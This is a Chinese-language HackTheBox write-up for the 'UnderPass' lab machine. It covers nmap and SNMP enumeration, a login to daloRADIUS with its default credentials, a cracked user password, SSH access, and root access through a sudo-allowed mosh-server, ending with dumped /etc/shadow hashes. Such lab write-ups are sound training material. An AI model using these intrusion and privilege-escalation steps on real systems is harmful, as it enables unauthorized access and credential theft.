基本信息

https://app.hackthebox.com/machines/UnderPass
10.10.11.48

端口扫描

22和80:

$ nmap -sC -sV -Pn 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-23 14:35 CST
Nmap scan report for 10.10.11.48
Host is up (0.086s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48:b0:d2:c7:29:26:ae:3d:fb:b7:6b:0f:f5:4d:2a:ea (ECDSA)
|_  256 cb:61:64:b8:1b:1b:b5:ba:b8:45:86:c5:16:bb:e2:a2 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.88 seconds

这台机器还需要udp扫描：

$ sudo nmap -sU -Pn 10.10.11.48
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-23 14:44 CST
Nmap scan report for underpass.htb (10.10.11.48)
Host is up (0.080s latency).
Not shown: 997 closed udp ports (port-unreach)
PORT     STATE         SERVICE
161/udp  open          snmp
1812/udp open|filtered radius
1813/udp open|filtered radacct

Nmap done: 1 IP address (1 host up) scanned in 1043.46 seconds

80

直接访问是apache默认页面：

SNMP

snmp可以看到underpass.htb，以及daloradius server之类信息：

daloradius

根据得到的信息添加hosts，直接尝试访问daloradius是403:

常规目录扫描：

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://underpass.htb/daloradius/

/.gitignore           (Status: 200) [Size: 221]
/ChangeLog            (Status: 200) [Size: 24703]
/LICENSE              (Status: 200) [Size: 18011]
/app                  (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/app/]
/contrib              (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/contrib/]
/doc                  (Status: 301) [Size: 323] [--> http://underpass.htb/daloradius/doc/]
/library              (Status: 301) [Size: 327] [--> http://underpass.htb/daloradius/library/]
/setup                (Status: 301) [Size: 325] [--> http://underpass.htb/daloradius/setup/]

路径直接访问也是403，但可以看出就是默认路径：

lirantal/daloradius: daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.
https://github.com/lirantal/daloradius

直接参考github repo访问登录页面：

operators那里默认账号密码登录

1	administrator:radius

management->list users，可以看到用户名及密码hash，解出来密码：

1
2
3

svcMosh 412DD4759978ACFCC81DEAB01B382403

underwaterfriends

user flag

得到的账号密码ssh登录：

1 2	ssh svcMosh@10.10.11.48 underwaterfriends

提权信息

可以sudo运行mosh-server，搜索可以知道这就是一个远程终端程序，所以sudo运行的server，相当于一个root shell，使用对应客户端连接即可

mobile-shell/mosh: Mobile Shell
https://github.com/mobile-shell/mosh

提权 & root flag

运行mosh-server，使用mosh-client连接：

1	svcMosh@underpass:~$ MOSH_KEY=zTvNRaskmhEqBM5mElUeDA mosh-client 127.0.0.1 60001

shadow

1
2

root:$y$j9T$y6GVl9yuguP9lhnKmS04c.$pzmkCXRNa/BCrMpnOUxIWUbVR905YSEHwW20O40wEaA:20057:0:99999:7:::
svcMosh:$y$j9T$cK5jfCW.c6g5yvOzPF5iF1$E0geEsKPdNSCLj2wVbvftMGkbs.uJL7B0ADA41Q8Y08:20067:0:99999:7:::

参考资料

lirantal/daloradius: daloRADIUS is an advanced RADIUS web management application for managing hotspots and general-purpose ISP deployments. It features user management, graphical reporting, accounting, a billing engine, and integrates with OpenStreetMap for geolocation. The system is based on FreeRADIUS with which it shares access to the backend database.
https://github.com/lirantal/daloradius
mobile-shell/mosh: Mobile Shell
https://github.com/mobile-shell/mosh

UnderPass - HackTheBox

2024-12-22